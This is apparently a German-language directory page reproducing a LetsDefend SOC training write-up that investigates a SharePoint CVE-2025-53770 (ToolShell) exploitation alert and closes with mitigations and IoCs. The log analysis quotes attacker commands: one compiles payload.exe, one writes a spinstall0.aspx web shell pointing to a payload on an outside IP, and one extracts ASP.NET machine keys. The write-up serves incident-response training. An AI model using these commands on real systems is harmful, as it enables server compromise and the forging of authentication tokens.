Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Eine Aktivität zur Schulung von Analysefähigkeiten und Berichterstattung | Kitploit
Tools/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationForensikBedrohungsanalyseLernen & BildungIncident ResponseLabs & Praxis
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Eine Aktivität zur Schulung von Analysefähigkeiten und Berichterstattung

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Dies ist eine Untersuchung, die auf der Let's Defend-Plattform durchgeführt wurde, basierend auf einer aktuellen SharePoint-CVE. Werfen wir einen Blick darauf.

Immagine 2025-07-27 162109
  1. Untersuche den Regelnamen. Regelnamen werden normalerweise speziell für den zu erkennenden Angriff erstellt. Durch die Untersuchung des Regelnamens kannst du erkennen, welchem Angriff du gegenüberstehst.

Die SOC342-Regel hat eine nicht authentifizierte POST-Anfrage erkannt, die auf die anfällige ToolPane.aspx-Seite abzielt, mit folgenden Merkmalen:

  • ein großes Payload (Content-Length: 7699)
  • ein verdächtiger Referer (SignOut.aspx), der wahrscheinlich zur Verschleierung des Ursprungs verwendet wird
  • Verhalten, das mit der Exploitation der ToolShell-Schwachstelle übereinstimmt
  1. Erkenne, zwischen welchen beiden Geräten der Datenverkehr stattfindet.

Ein externer Benutzer (IP: 107.191.58.76) hat eine präparierte Anfrage an einen internen SharePoint-Server (172.16.20.17) gesendet.

Analysiere das Log unseres Endpunkts

2

Ein w3wp.exe-Prozess, der einen codierten PowerShell-Befehl ausführt, kann auf eine potenzielle Exploit- oder Post-Exploitation-Aktivität hinweisen (z.B. Ausführung eines versteckten Payloads).

In einer SharePoint-Umgebung ist es wichtig zu überprüfen, ob dieses Verhalten erwartet wird oder ob es einen Missbrauch darstellt.

Der Befehl wurde mit base64 verschleiert

Immagine 2025-07-27 163800

Dieses Payload ermöglicht dem Angreifer, kritische ASP.NET-Konfigurationsschlüssel von dem Rechner, auf dem es ausgeführt wird, zu extrahieren und auszugeben.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Kompiliert eine ausführbare Datei aus C#-Quellcode auf dem Server.

Erstellt eine Web-Backdoor (bösartige ASPX-Datei) im SharePoint-Pfad, die beim Besuch die Ausführung oder das Herunterladen eines externen Payloads ermöglicht.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Dieser Befehl erstellt eine Datei namens spinstall0.aspx im SharePoint-LAYOUTS-Ordner und schreibt den Inhalt hinein (hier ist ein Platzhalter, der den Code einer Webshell darstellt).

Dies ist der Hash von spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Werfen wir einen Blick auf VirusTotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Dieser Befehl ermöglicht es dem Angreifer, auf die Anwendungskonfiguration von MachineKeySection zuzugreifen, was sensible kryptografische Schlüssel wie den Validierungsschlüssel und den Entschlüsselungsschlüssel offenlegen kann.

Diese Schlüssel sind für die ASP.NET-Sicherheit von entscheidender Bedeutung und schützen Dinge wie Authentifizierungs-Cookies und ViewState.

Das Offenlegen oder Abrufen dieser Schlüssel kann es Angreifern ermöglichen, Authentifizierungs-Token zu fälschen, geschützte Daten zu entschlüsseln oder andere Angriffe gegen die Webanwendung durchzuführen.

MITRE ATT&CK

mitre

Analystennotiz:

Der Alarm wurde aufgrund ungewöhnlicher PowerShell-Aktivitäten auf einem SharePoint-Server ausgelöst, die später als Exploit-Versuch gegen CVE-2025-53770 identifiziert wurden. Der Angreifer legte zunächst eine benutzerdefinierte C#-ausführbare Datei (payload.exe) ab und kompilierte sie mit dem C#-Compiler (csc.exe), erstellte dann eine bösartige ASPX-Webshell (spinstall0.aspx) in einem webzugänglichen SharePoint-Verzeichnis. Anschließend wurde ein PowerShell-Befehl ausgeführt, um sensible kryptografische Maschinenschlüssel über .NET-Reflection aus der Serverkonfiguration abzurufen. Diese Abfolge von Aktionen deutet auf einen mehrphasigen Angriff hin, der darauf abzielt, eine dauerhafte Kontrolle zu behalten und möglicherweise Authentifizierungs-Token zu fälschen. Die Webshell wurde als bösartig bestätigt mit einem VirusTotal-Erkennungsverhältnis von 39/62. Der Vorfall wurde als True Positive bestätigt, und es werden weitere Eindämmungs- und Abhilfemaßnahmen empfohlen.

Immagine 2025-07-27 170751

CVE-2025-53770 Detail

Deserialisierung nicht vertrauenswürdiger Daten in einer lokalen Microsoft SharePoint Server-Instanz ermöglicht einem nicht autorisierten Angreifer die Codeausführung über ein Netzwerk. Microsoft ist bekannt, dass ein Exploit für CVE-2025-53770 in freier Wildbahn existiert. Microsoft bereitet ein umfassendes Update vor und testet es gründlich, um diese Schwachstelle zu beheben. Stellen Sie in der Zwischenzeit bitte sicher, dass die in dieser CVE-Dokumentation bereitgestellte Abschwächung implementiert ist, um vor Ausnutzung geschützt zu sein.

Immagine 2025-07-27 171020

Von Microsoft vorgeschlagene Abschwächungsmaßnahmen: Um potenzielle Angriffe abzuschwächen, sollten Kunden:

  1. Unterstützte Versionen des lokalen SharePoint-Servers verwenden
  2. Die neuesten oben verlinkten Sicherheitsupdates anwenden.
  3. Microsoft Defender for Endpoint-Schutz oder gleichwertige Bedrohungslösungen bereitstellen
  4. Sicherstellen, dass die Antimalware Scan Interface (AMSI) aktiviert und korrekt konfiguriert ist, mit einer geeigneten Antivirenlösung wie Defender Antivirus
  5. SharePoint Server-ASP.NET-Maschinenschlüssel rotieren

IoC

Spinstall0.aspx Von Bedrohungsakteuren verwendete Webshell

Die Akteure haben den Dateinamen auch auf verschiedene Weise geändert – wie z.B. spinstall.aspx, spinstall1.aspx, spinstall2.aspx

Dieser Bericht basiert auf einer Aktivität, die auf der Let’s Defend-Plattform durchgeführt wurde. Alle präsentierten Erkenntnisse und Materialien dienen nur zu Bildungszwecken. Alle Rechte und das Eigentum gehören Let’s Defend.

Tool herunterladen